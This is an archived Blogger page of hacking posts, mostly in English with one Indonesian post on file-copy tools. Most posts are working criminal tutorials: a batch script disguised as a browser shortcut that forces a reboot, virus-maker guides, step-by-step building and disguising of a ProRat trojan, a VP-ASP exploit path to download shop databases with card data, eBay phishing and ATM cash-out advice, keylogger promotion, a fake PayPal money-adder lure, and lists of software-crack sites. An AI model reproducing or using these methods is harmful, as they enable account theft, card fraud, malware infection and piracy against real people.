™ KEN AROK ™

welcome to my blog

  • SLIDER-1-TITLE-HERE

    Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.[...]

  • SLIDER-2-TITLE-HERE

    Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.[...]

  • SLIDER-3-TITLE-HERE

    Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.[...]

  • SLIDER-4-TITLE-HERE

    Replace these every slider sentences with your featured post descriptions.Go to Blogger edit html and find these sentences.Now replace these with your own descriptions.[...]

Jumat, 22 Juni 2012

Facebook Hacking Course

Posted by IKAM TGB on 15.32

Are you shocked? Well, many irritated hacking pseudo-experts asked me such a question.

Thanks to the media, the word “hacker” has gotten a bad reputation. The word summons up thoughts of malicious computer users finding new ways to harass people, defraud corporations, steal information and maybe even destroy the economy or start a war by infiltrating military computer systems. While there’s no denying that there are hackers out there with bad intentions, they make up only a small percentage of the hacker community.

This is the picture of a hacker. Fortunately, it's the one created by the media. Considering the definition above, this course should be entitled "Anti Facebook Hacking Course", as it has nothing to do with the media nonsense. Let me explain you why.

What is this Facebook Hacking Course really about?

Facebook Hacking Course basically contains series of videos which will tell you exactly how hackers hack facebook accounts, what methods they use and how you can avoid falling for these kinds of attacks. The course contains Video Modules parts which will tell you about Facebook hacking and security and with each part there is a lab where you can practice what you learned.



The author of this course is Rafay Baloch, an expert into the field of hacking. His Facebook Hacking Course contains:
  • The exact techniques which hackers use to hack facebook accounts.
  • Security tips to protect your facebook account from getting hacked.
  • Protecting your Privacy

And the best part of this course is that he has made it in such a manner that even a 5th grade kid can understand it and learn how to hack facebook account.

With my experience of over 3 years in the field of ethical hacking and security, all I can tell you is that this course contains everything a beginner needs to learn how to hack facebook, and to educate the Internet users to be aware of the common scams and frauds and stay away from them. This course does not demand any prior knowledge about Hacking.
Bonus

By buying this Facebook Hacking Course you will get the following bonus:

1. Secret Anonymizing Techniques

This section will contain 2 bonus videos which will tell you the exact methods used by hackers to hide their identity while doing malicious things online.

2. Direct Email Access and Support
If you get stuck or don't understand any thing presented in the course, there is 24/7 support to help you no longer how much time it takes. However this offer is for limited time only.

Facebook Virus Prank - Making fun to your friend

Posted by IKAM TGB on 15.31

Fake Facebook Virus | Freak Out Your Friends

In this post i'll show you an easy step by step tutorial about how to make a Facebook virus using simple commands on notepad. This will make the victims think that they have a virus when they click on an icon such as Internet Explorer or Mozilla Firefox...
This "virus" is totlly harmless and won't do any damage to your victims computer.
When a victim clicks on the icon he will get a warning message like "WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!". You can change the text to whatever you want. If you have some other interesting ideas, let me know. This virus doesn't do anything to your friends pc, but to see his scared face, that's something :)...

Now let's start with the tutorial:

1) Open notepad

2) Type the following text in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."



3) Save as Internet Explorer .bat
(or whatever you want, but be shure that the last letters are .bat)



4) Right click on Internet Explorer .bat and click Create Shortcut




5) Right click on shorcut and click Properties.



6)Click Change Icon



7) Choose Internet Explorer icon (or Mozilla Firefox, or any other icon similar to it), click OK , then click Apply



8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:




Hope you'll freak out friend(s).

If this prank was successful and there was some interesting reactions of your friends, feel free to share it with us.

The Ultimate Virus - The Best Virus Prank Program Ever

Posted by IKAM TGB on 15.30

The Ultimate Virus - The Best Virus Prank Program Ever to Shock Your Friends
The Ultimate Virus is one of the best virus prank programs on the net. This is a prefect prank software and your friends will definitely "love" it and don't be suprised if they try to kill you for making fool on them :P. Just imagine how fun could it be to see how this fake virus is freaking out your friends and making them crying for mummy. LOL!

This virus prank tool
acts like a deadly virus that can cause huge damages to your friends computers, but in fact it's just a fake virus prank and it won't harm the pc in any way.

After running the program, a progress bar will appear, inform user if virus loading is in progress. The taskbar and desktop icons will disappear and a dialog box is displayed that contains three choices:

1. Format Hard Disk
2. Delete Windows Folder
3. Delete All Contents on Local Disk


Format Hard disk


When you click this button a progress bar will appear saying "formatting is in progress", but actually it's not. If you click click "Cancel" button, then a fake "Blue Screen Of Death" will appear! This is really creepy.

Delete Windows Folder

If you choose this option the program will scan all files and folders on your Windows folder and after that a progress bar will appear displaying deletion progress. An advanced Windows user will be tricked because it displays all files on their systems are being deleted.

Delete All Contents on Local Disk

This is similar to above,
but it just scan folders on your root folder. It can't scan all of the files and folders on your hard disk because it will lag the application.

After all progress is finished, the program will does a fake restart. It displays black screen and text with MS-DOS style, so your friend will be tricked that their computer is being in boot mode. Then, a beep coming from computer speaker, and a frightening text appear: "BIOS image has been corrupted.


"There is a problem with your motherboard ROM. Press any key to try again". When your friend reach three attempts, a text appears that their motherboard is permanently damaged!

How to remove this program?

All you have to do is just to
delete the program from your computer and it won't run again. The good thing is that it doesn't install itself to your system.

Note: Some antiviruses and antispywares are detecting this program as infected/malware. The program is perfectly safe and does not pose a threat to your system. This is called a 'false positive'. The term false positive is used when antivirus software wrongly classifies an innocuous ( inoffensive ) file as a virus. The incorrect detection may be due to heuristics or to an incorrect virus signature in a database. Similar problems can occur with antitrojan or antispyware software.


Screenshots



How to Create a Computer Virus

Posted by IKAM TGB on 15.29

Virus Software: How to make Virus/Create Virus

I have previously posted about How to Create a Fake and Harmless Virus. In this article i want to show you how to create a real virus using Virus Software. I compiled a list of some great virus maker softwares. Now you don't have to know any programming or coding to make virus. Simply use one of these Virus softwares and you can easily make virus for yourself. These virus softwares provides you with various options which you can use to make virus according to your preferences. The virus programs are tested to well working on all Windows systems.

Here is the list of the softwares that allows you to make Virus:

1. In Shadow Batch Virus Generator

1. First of all download the virus maker from here

2. Run "In Shadow Batch Virus Generator.exe" application to see something like this:


3. You can use various options to make virus to suit your needs. You can:
  • Infect files of various extensions
  • Insert virus in startup menu, Kill various processes.
  • Disable all security services like Windows Defender, Antivirus, Firewall.
  • Rename file extensions, spread virus via file sharing.
  • Create new admin account, change user account password.
  • Block various websites, download trojan files to victim computer, shutdown victim computer and much more.

4. After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.

5. Now, you have your virus ready to hack your victim. This virus maker is undetectable by the most antiviruses.

I am not responsible for any action performed by you. Also, do not try this virus on your own computer. This virus software is one of the most efficient virus software used today.


2. JPS Virus Maker


This is also a great virus maker with many features in it. Check all the features of JPS Virus maker here.


3. TeraBIT Virus Maker


A powerful virus maker for you. Look for updates here

Download JPS Virus Maker and TeraBit Virus Maker.

These two virus makers are detected as a viruses by the most anti-virus softwares, but they won't harm your pc in any way. Before you run these virus makers disable your anti-virus temporarily.

If you know other virus makers i want to hear your suggestions.

How to Hack E-Mail Account Password - Email Hacking Software

Posted by IKAM TGB on 15.28

How to Hack E-Mail Account Passwords Using Trojans and Keyloggers

I've been posting a lot about Email Hacking on this blog. Now you know that there are many ways to hack email password, like bruteforcing, social engineering or Reverting, but the main two methods used to hack email passwords are Remote Keylogging and Phishing. In this article i'll show you how to hack email account password using keyloggers and trojans. Here I am demonstrating using PRORAT trojan. You can use any trojan or keylogger as per your ease. The basic functionality of all backdoors are same. Pls make note that all these hacking tools and softwares are detected by antivirus. You have to uninstall or close you running antivirus first. Now we can start.

How to Hack Email Account Passwords Using ProRat?


1. First of all Download ProRat. Once it is downloaded right click on the folder and choose to extract it. A password prompt will come up. The password will be "pro".

2. Open up the program. You should see the following:


3. Next we will create the ProRat Trojan server. Click on the "Create" button in the bottom. Choose "Create ProRat Server".


4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options.


5. Now Open General settings. This tab is the most important tab. In the check boxes, we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

Here is a quick overview of what they mean and which should be checked:


6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. A good suggestion is a picture or an ordinary text document because that is a small file and its easier to send to the people you need.


7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I prefer using .exe files, because it is cryptable and has icon support, but exe’s looks suspicious so it would be smart to change it.


8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document.

9. After this, press Create server, your server will be in the same folder as ProRat. A new file with name "binded_server" will be created. Rename this file to something describing the picture. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it.

Very important: Do not open the "binded_server" file on your system.

10. You can send this trojan server via email, pendrive or if you have physical access to the system, go and run the file. You can not send this file via email as "server.exe", because it will be detected as trojan or virus. Password protect this file with ZIP and then email it. Once your victim download this ZIP file, ask him to unlock it using ZIP password. When the victim will double click on the file, he will be in your control.

11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next.

Once the victim runs the server on his computer, the trojan will be installed onto his computer in the background. The hacker would then get a message telling him that the victim was infected. He would then connect to his computer by typing in his IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to the victims computer and have full control over it.


12. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all victim's computer files, he can shut down his pc, get all the saved passwords off his computer, send a message to his computer, format his whole hard drive, take a screen shot of his computer, and so much more. Below I’ll show you a few examples.


13. The image below shows the message that the victim would get on his screen if the hacker chose to message him.


14. Below is an image of the victims task bar after the hacker clicks on Hide Start Button.


15. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.


As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.

How to Find a Serial Number for Any Program

Posted by IKAM TGB on 15.23

I assume that most of you use pirated software. Not everyone can afford buying a program like Photoshop, which costs $699. In this case you can use alternative, free software or you can download a pirated, cracked version of the program. There is a vast number of websites out there, where you can find serial numbers and cracks for any program, but most of them aren't safe to use. Actually most of them are spam sites that “bombard” you with full-screen popup ads, or commandeer your computer into a spam-loving Kraken or Srizbi Botnet army. In this post I will show you the most efficient way of downloading cracks and serial numbers without any risk to your pc.

Craagle is a free search engine that allows users to search every sort of cracks, serials, keys, keygen and covers, without falling into sh*t, like annoying toolbars, pop-ups, spyware, ad-ware and mal-ware that the crack sites or search sites abundant with.


It works by doing the searching the cracks, serials or album covers directly from Craagle program without the need to visit the websites. Craagle has added advantage of able to search for cover images or graphics for CD, DVD, audio, games and etc.

You can also use a proxy to bypass Day Limit for some sites.
  • Crack Sites Supported :
Cracks.Am, KeyGen.Us, AllCracks.Net, Andr.Net, Crack.Ms,Crackz.Ws, CrackArchive.Com, CrackDb.Com, CrackzPlanet.Com,CrackWay.Com, MsCracks.Com, CrackPortal.Com, TheCracks.Us,KeyGen.Ru
  • Serial Sites Supported :
Seriall.Com, FreeSerials.Com, SerialSite.Com, Serials.Ws, Andr.Net, SerialKey.Net, SerialArchive.Com, CrackzPlanet.Com,MsCracks.Com, CrackPortal.Com, KeyGen.Name, TheKeys.Ws,FreeSerials.Ws, FreeSerials.Spb.Ru, Serial.220volt.Info,SerialCodes.Net
  • Cover Site Supported :
CoverTarget.Com, CoverAll.Come.To, CoverIsland.Com

Download Craagle

Here i also want to present you a list of "clean" crack sites for all the latest warez to unlock your software.

Please note that the site reviews herein only include information about each site, not the contents of the 'cracks' themselves. Always use a reputable antivirus and antispyware program on cracks & keygens before using them. The same goes for Craagle

Hope you will have no more problems searching for cracks and serial numbers.

How to Hack a Credit Card

Posted by IKAM TGB on 15.22

Hi there. This is my first serious "black hat hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $$ it. Now I'm sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).


This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

Lets start with some easy terms.

What is credit card ?

Credit cards are of two types:
  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and u can use them and by the end of month pay it to bank.

To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).

If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.

Let me explain how ?

First study some simple terms.

BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.

Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashiers.

Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.

Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower

Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.

Credit Card Hacking

CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking

This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.

Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.

I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.

Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.

Lets start:

Type: VP-ASP Shopping Cart
Version: 5.00

How to find VP-ASP 5.00 sites?

Finding VP-ASP 5.00 sites is so simple...

1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed

Now let's go to the exploit..

The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp

A page will appear contain those:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
Example:

The most important thing here is xDatabase
xDatabase: shopping140

Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb

If you didn't download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb

If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb

Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.

The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp

If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp


2. Hacking Through Scams

This method is usually used to hack for earning money. What happens in this method is you create a clone page.

Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.

What is eBay.com?

Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.

How to get the emails of their users?

Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.

Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..

Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.

Search on google to download a scam site and study it !

After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.

And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay

Some Instructions:

1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.

How To Hack E-Mail Password - E-Mail Hacking Software

Posted by IKAM TGB on 15.21

I know most of you might be wondering to know how to hack email? You as the reader are most likely reading this because you want to hack into someone’s email. Well before you try to hack any E-Mail password, it is necessary to understand the real ways of hacking that actually work and also those that are simply scam and don’t work. Everyday I get a lot of emails where people ask me “how to hack E-Mail password?” So in this post I have taken up this topic to show you the possible ways to do that!


Is it possible to hack emails?

Yes! As a matter of fact, almost anything can be hacked. But before you learn the real ways to hack email, the following are the things you should be aware of.

1. There is no ready made software that can hack emails and get you the password just with a click of a button. So if you come across any website that claims to sell such softwares, I would advise you not to trust them.

2. Never trust any email hacking service that claims to hack any email for just $100 or $200. Most of them are no more than a scam.

So, guys, remember this is all crap. There's no reality in this email hacking service or software.

How can we Hack Email Password?


Hacking email passwords is not that easy. You can't do that by simply entering the email address and waiting for the software to crack passwords. Instead, you have to fool victim to give his own password without his knowledge. The main methods used to hack Email passwords are:

1. Remote Spy Software

The easiest way to hack an email is by using a remote spy software (Also known as keylogger). A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. Once installed, this program will automatically load from the start-up, runs in invisible mode and start capturing each and every keystroke that was typed on the computer. Some keyloggers with advanced features can also capture screenshots and monitor every activity on the computer. To install and use a kelooger one doesn’t need to have any special knowledge. That means anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack email password. I recommend the following keylogger as the best for gaining access to email password.
SniperSpy is a revolutionary product that will allow you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!

Once installed on the remote PC(s) you wish, you only need to login to your own personal SniperSpy account to view activity logs of the remote PC’s! This means that you can view logs of the remote PC’s from anywhere in the world as long as you have internet access!


Why SniperSpy is the best?


Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this you can install it on a remote computer without the need for having physical access to it. It operates in complete stealth mode so that it remains undetected. This Remote PC Spy software also saves screenshots along with text logs of chats, websites, keystrokes in any language and more. Includes LIVE admin and control commands!

SniperSpy Features:
  • Access ANY Password
With SniperSpy you can hack any password and gain access to email or any other online account.
  • Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.
  • Never Get Caught
SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught.
  • Remote Installation Feature
With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer.
  • Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.
  • Completely Safe to Use
This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.
  • Works on both Windows and Mac
Fully compatible with Windows 2000/XP/Vista/7 and Mac.

So what are you waiting for? If you are really serious to hack E-Mail Password then SniperSpy is for you. Go grab it now and expose the truth!



Download SniperSpy for Mac


2. Other Ways to Hack E-Mail Password



- Phishing


In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public.

How does it work:

You can download/make a replica of the website you want to phish and save is as HTML. When you’re done with that, you have to find a way to upload the HTML. You can use free hosting site or a website like Blogspot, Piczo, etc. When the victim enters his email and password on the login field, phishing site save those login details and they will be automatically sent to you by mail.

Perform Phishing


- Bruteforcing


This is somewhat debating method. I have never personally tried but, read on various site and hacking forums. It is said that Hotmail accounts can be bruteforced. In Bruteforcing, you have to get wordlist - which contains various words and these words are tried out as passwords for victim hotmail account. Generally, for other sites like Gmail, Yahoo, etc. you have limited account login chances and once that number of chances expire, you are not allowed even to try to login. This mechanism helps in avoiding Bruteforce attack against email accounts. So, it is debating to say that Hotmail account passwords can be hacked (actually cracked) by Bruteforcing.

The most famous Bruteforcing software used is Brutus. But, remember, for hacking hotmail account password by Bruteforcing, you must have good quality wordlist which can be obtained via Google.


- Social engineering

This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on orkut and i got his gmail password very easily by this method. I think many of you might be knowing how what this social engg is. For newbies, social engineering is method of retrieving password or answer of security question simply be queering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.


- USB Thief

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend's/college Computer. Read my article How to Hack Passwords Using USB Pen Drive for more information.


So friends, these are most useful ways to hack email account password. I have tested most of them and found to be working to hack email account password. Just give them a try to hack your victim email account passwords. I will appreciate your effort if you mention any other email hacking method you found great to hack email account password. Happy Email Hacking!

How to Hack PayPal Accounts using PayPal Hacking Software

Posted by IKAM TGB on 15.20

In my previous post I've been showing How to Hack PayPal Accounts using Fake Login Page. In this article i will show you how to hack PayPal accounts using PayPal hacking software.

This tutorial is written by Saint Andrew, a loyal reader of this blog.

Note: Hacking credit cards or Bank accounts like PayPal is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.

This is fake PayPal Money Adder software to help you bind your keylogger or whatever Trojan server you have. This PayPal Money Adder software seems to be used to Add some Money to your PayPal Account, but actually this is fake PayPal Money Adder software used only as means for installing Trojan Server binded with it on victim computer.

PayPal Money Adder to bind your Trojan Server

1. Download link of Fake PayPal Money Adder is HERE

2. PayPal Money Adder is free fake application which appears to hack PayPal Accounts, now run .exe application to see something like this:


Note: PayPal Money Adder is a FAKE application. It doesn’t add any money to your PayPal Account. It is only used to fool victim and to bind your Trojan server.

3. When you open this, there is a TextBox to type your PayPal Email, and you have to select how much money you want to Add. After that, click on Send Money, and Progress Bar will start.

4. When Progress Bar is full, it will says “Money Has Been Added to your Account Successfully “ as in the Picture below, but it wont add any money to your Account !!!


5. So that is one fake PayPal Money Adder, not one real !!!

6. Now create a keylogger or whatever server (like stealer or RAT), crypt it, and bind with this application. You can use Shock Labs File Binder or Easy Binder. You can find some binders on this blog, just search for it !!!

7. Now, send this binded PayPal Money Adder to your victim and tell him this PayPal Money Adder is used to Add Money to PayPal Accounts. You can use Social Engineering for this. So as long as he runs PayPal Money Adder on his computer, your keylogger server is installed on his computer.

8. Many other Fake Hacking Tools are coming soon, like AlertPay Money Adder, Skype Money Adder, Ultimate Password Cracker, Neobux Hacker and other!!!


5 Tools Gratis Mempercepat Penyalinan File Di Windows

Posted by IKAM TGB on 15.17

Ketika anda sedang menyalin atau memindahkan beberapa file besar di windows, seringkali beberapa proses penyalinan dapat dirasakan cukup lama, apalagi proses salinan tersebut dipindahkan dari partisi satu ke partisi yang lain. Dari berbagai tools untuk mempercepat proses penyalinan di windows cukuplah banyak. Ada yang berbayar dan ada juga yang gratisan. Dibawah ini saya membagikan 5 Tools Gratis Untuk Mempercepat Kopi File Di Windows, dan tentunya bersifat freeware (tanpa perlu aktivasinya). Diantaranya adalah :


TeraCopy

TeraCopy ini merupakan salah satu tools yang paling banyak digunakan. Dengan TeraCopy ini, kita dapat menyalin dengan cepat sesuai dengan perangkat (hardware) yang kita miliki. Program ini juga dapat menerapkan sistem resume. file transfer, dimana dengan sistem ini, kita dapat menghentikan sejenak proses penyalinan untuk meng-istirahatkan perangkat yang kita miliki. Selain itu, TeraCopy ini juga menawarkan proses penyalinan yang sinkron untuk mempercepat penyalinan antara 2 hardisk yang berbeda. Dan yang lebih menariknya pada program ini, ketika suatu kesalahan file transfer di temui, maka program ini tidak akan menghentikan secara total pada proses penyalinannya tersebut, tapi program ini akan melewatkan kesalahan tersebut dan mencobanya beberapa kali. Tidak seperti pada windows yang secara defaultnya.
Download TeraCopy


ExtremeCopy

Dengan tampilannya yang sederhana, ExtremeCopy ini mampu untuk meningkatkan kecepatan file transfer dari 20% hingga 120%. Tentunya juga dilengkapi dengan Error Recovery. Dan ExtremeCopy ini, dapat menghitung secara akurat dari sisa waktu pada proses penyalinan data yang dilakukannya.
Download ExtremeCopy


SuperCopier

Selain dapat melakukan proses resume, ini juga dapat menyimpan file error log dan juga salinan daftar file, sehingga kita dapat melanjutkan kembali sesuai dengan waktu yang kita inginkan. Dalam proses penyalinannya pun dapat diatur sesuai yang kita inginkan.
Download SuperCopier


Copy Handler

Copy Handler ini sangat disesuaikan dan sepenuhnya terintegrasi khusus untuk windows os. Selain dapat melakukan pemilihan file, juga dapat mem-filter bedasarkan kriteria file yang akan kita pindahkan. Dengan proses resume yang ada, kita juga dapat mengubah settingan untuk proses penyalinan dengan cepat dengan akselerasi yang sudah diatur sedemikian rupa, sehingga dapat mempercepat hingga 6 – 7 kali dari kecepatan biasanya.
Download Copy Handler


Talent Copy V

Talent Copy V merupakan program kecil dengan kecepatan transfer 3 kali diatasnya. Ketika proses penyalinan data dilakukan, program ini akan menyesuaikan dengan kemampuan prosessor dan RAM yang kita miliki dengan sistem progress yang dapat kita pantau secara langsung.
Download Talent Copy V
Bagi anda yang tertarik, apa salahnya untuk mencoba dari semua program diatas. Selain gratis, juga menawarkan berbagai fitur yang berbeda-beda.




by daunmuda.net

FB

  • RSS
  • Delicious
  • Digg
  • Facebook
  • Twitter
  • Linkedin

Search Site

 
  • Translate

  • GRUBUNG

    Read more: http://ikam-tgb.blogspot.com/2011/11/cara-membuat-kursor-mouse-diikuti-teks.html#ixzz1huMObk6h

    twit

    DETENK


    eeq